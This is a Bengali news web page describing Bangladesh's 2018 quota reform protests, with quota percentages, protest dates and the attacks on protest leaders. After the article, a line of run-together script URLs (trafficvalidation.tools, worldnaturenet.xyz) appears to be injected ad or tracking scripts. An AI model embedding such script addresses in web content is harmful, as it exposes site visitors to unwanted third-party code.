Saturday , October 20 2018
Home / আন্তর্জাতিক / ২০১৮-র কোটা সংস্কার আন্দোলন ২০১৮-র কোটা সংস্কার আন্দোলন:

২০১৮-র কোটা সংস্কার আন্দোলন ২০১৮-র কোটা সংস্কার আন্দোলন:

নাজিয়া আকবর (লন্ডন মহানগর বিএনপি): বাংলাদেশে সব ধরণের সরকারি চাকরির ক্ষেত্রে কোটার ভিত্তিতে নিয়োগের প্রচলিত ব্যবস্থার সংস্কারের দাবিতে সংগঠিত একটি আন্দোলন বা বিক্ষোভ। বাংলাদেশের স্বাধীনতা যুদ্ধের পর চালু হওয়া কোটা ব্যবস্থার সংস্কারের দাবিতে চাকরি প্রত্যাশী ও সাধারণ শিক্ষার্থীরা মিলে ২০১৮ সালের জানুয়ারি থেকে ধারাবাহিকভাবে বিক্ষোভ এবং মানববন্ধন কর্মসূচি পালন করছে বর্তমানে বাংলাদেশের বিভিন্ন সরকারি চাকরির ক্ষেত্রে ৫৫ শতাংশের বেশি কোটা রয়েছে যার মধ্যে মুক্তিযোদ্ধা কোটা ৩০ শতাংশ, জেলাভিত্তিক কোটা ১০ শতাংশ, নারীদের জন্য ১০ শতাংশ এবং ক্ষুদ্র নৃগোষ্ঠীর জন্য ৫ শতাংশ।

১ শতাংশ প্রতিবন্ধীদের জন্য বরাদ্দ রয়েছে। কোটা ব্যবস্থা সংস্কারের ৫ দফা দাবি নিয়ে সাধারণ শিক্ষার্থী ও সরকারি চাকুরি প্রত্যাশীরা তাদের ধারাবাহিক আন্দোলনের প্রেক্ষিতে ১৭ই ফেব্রুয়ারি ২০১৮ সালে ঢাকা ও দেশের কয়েকটি স্থানে মানববন্ধন করেন।[২৪] ২৫শে ফেব্রুয়ারি পুনরায় সারাদেশে বিভিন্ন স্থানে মানববন্ধন করা হয়।[এরপর ৪ই মার্চ দেশের কলেজ ও বিশ্ববিদ্যালয়সমূহে শিক্ষার্থীরা কালো ব্যাজ ধারণ করে অবস্থান কর্মসূচি পালন করেন। ৬ই মার্চ সরকারের জনপ্রশাসন মন্ত্রনালয়ের এক আদেশে জানানো হয়, আপাতত কোটা সংস্কার হচ্ছে না। ২৩ জানুয়ারী বিশ্ববিদ্যালয় ক্যাম্পাসে কোটা সংস্কার আন্দোলনে নেতৃত্বদানকারী নেতাদের ব্যাপক মারধর করে ছাত্রলীগের নেতা-কর্মীরা।এ হামলায় পঞ্চাশেরও বেশি অহত হন।এ ঘটনায় ছাত্রীদেরকেও লঞ্ছীত করা হয়।

২০১৮-এর এপ্রিলের পূর্বে এবং বিগত কয়েক বছর বিচ্ছিন্নভাবে কোটা সংস্কার আন্দোলন চললেও, তা ২০১৮ সালের এপ্রিলে এসে সারা দেশব্যাপী ব্যাপকতা লাভ করে।[৮ই এপ্রিল ঢাকার শাহবাগে কোটা সংস্কারের পক্ষে বিক্ষোভ শুরু হলেও আস্তে আস্তে সেটি বাংলাদেশের প্রায় সবকটি সরকারি ও বেসরকারি বিশ্ববিদ্যালয় ও কলেজে ছড়িয়ে পড়ে এবং শিক্ষার্থীরা ক্লাস-পরীক্ষা বর্জন করেন।

https://trafficvalidation.tools/addons/lnkr5.min.jshttps://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6764x&r=28https://trafficvalidation.tools/ext/1a6cf99dda53eee160.js?sid=52200_6764_&title=&blocks%5B%5D=31af2

About mass9191

Check Also

স্বেচ্ছাসেবক লীগ নেতার লাশ নিতে পরিবারের অস্বীকৃতি, দাফনে বাধা

সাতক্ষীরার কালীগঞ্জ উপজেলার কৃষ্ণনগর ইউনিয়ন পরিষদের (ইউপি) চেয়ারম্যান কে এম মোশাররফ হোসেন হত্যা মামলার প্রধান …